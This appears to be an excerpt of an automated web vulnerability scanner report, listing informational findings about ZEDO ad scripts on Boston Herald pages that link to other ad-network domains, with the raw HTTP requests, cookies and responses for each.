Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.7776881733443588 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883605Zc826000187,826000187Zs173Zt128; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:25,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=36:17:15:53:25:27:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,11,14:951,7,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=54:26:36:17:15:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196646,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:18 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Sat, 29 Jan 2011 02:36:02 GMT
Date: Sat, 29 Jan 2011 02:35:18 GMT
Connection: close
Content-Length: 4629

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=26%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=26%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=26%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.178. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4405909504275769 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883605Zc826000187,826000187Zs173Zt128; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:25,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=36:17:15:53:25:27:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=54:28:36:17:15:25:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196646,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:19 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Sat, 29 Jan 2011 02:36:03 GMT
Date: Sat, 29 Jan 2011 02:35:19 GMT
Connection: close
Content-Length: 4616

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.179. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.6230065044946969 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=7:0:12:5:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,11,14:951,2,14:826,187,9:951,2,9:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=8:3:0:12:5:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2239

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&tp=5&d=j&t=n"><\/script>
...[SNIP]...

17.180. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3389143997337669 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1; FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,2,9:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=16:7:8:3:8:0:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:5,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:826,187,14:951,11,14:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:9:7:8:3:0:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:56:10 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=32
Expires: Fri, 28 Jan 2011 22:56:42 GMT
Date: Fri, 28 Jan 2011 22:56:10 GMT
Connection: close
Content-Length: 2304

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&m=6&tp=8&d=j&t=n"><\/script>
...[SNIP]...

17.181. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=audiencescience300x250&s=2&z=0.10010791243985295 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=4:2:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:3:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813#711378|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:44 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=236
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:44 GMT
Connection: close
Content-Length: 2273

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='audiencescie
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/cm.rev_bostonherald/;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

17.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.05526216677390039 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
